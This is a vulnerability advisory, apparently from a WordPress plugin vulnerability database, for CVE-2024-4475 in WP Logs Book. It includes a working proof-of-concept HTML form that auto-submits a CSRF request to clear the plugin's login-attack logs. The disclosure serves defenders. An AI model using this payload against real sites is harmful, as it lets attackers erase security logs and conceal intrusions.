WP Logs Book <= 1.0.1 – Log Clearing via CSRF | CVE 2024-4475 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when clearing logs, which could allow attackers to make a logged in admin clear the logs them via a CSRF attack

Proof of Concept

Make an admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://wps-test.ddev.site/wp-admin/admin.php?page=wp-logs-book/login_attack_log" method="POST"> 
        <input name="clear_log" type="text" value="Clear log">
        <input type="submit" value="submit">
    </form>
</body>
```

Note: The 404 Error Logs can also be cleared by modifying the PoC

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

f0c7fa00-da6e-4f07-875f-7b85759a54b3

Timeline

Publicly Published

2024-05-31 (about 1 year ago)

Added

2024-05-31 (about 1 year ago)

Last Updated

2024-05-31 (about 1 year ago)

Other

Published

Title

Published

2021-06-30

Title

BuddyPress Customer.io Analytics Integration <= 1.1.6 - Arbitrary Plugin Settings Update via CSRF

Published

2021-06-08

Title

Qtranslate Slug <= 1.1.18 - Cross-Site Request Forgery

Published

2024-06-20

Title

Ali2Woo Lite < 3.4.4 - PHP Object Injection via CSRF

Published

2025-06-19

Title

WP User Stylesheet Switcher <= v2.2.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-09-22

Title

Brands for WooCommerce < 3.8.2.3 - Missing Authorization to Unauthenticated Order Manipulation and Information Retrieval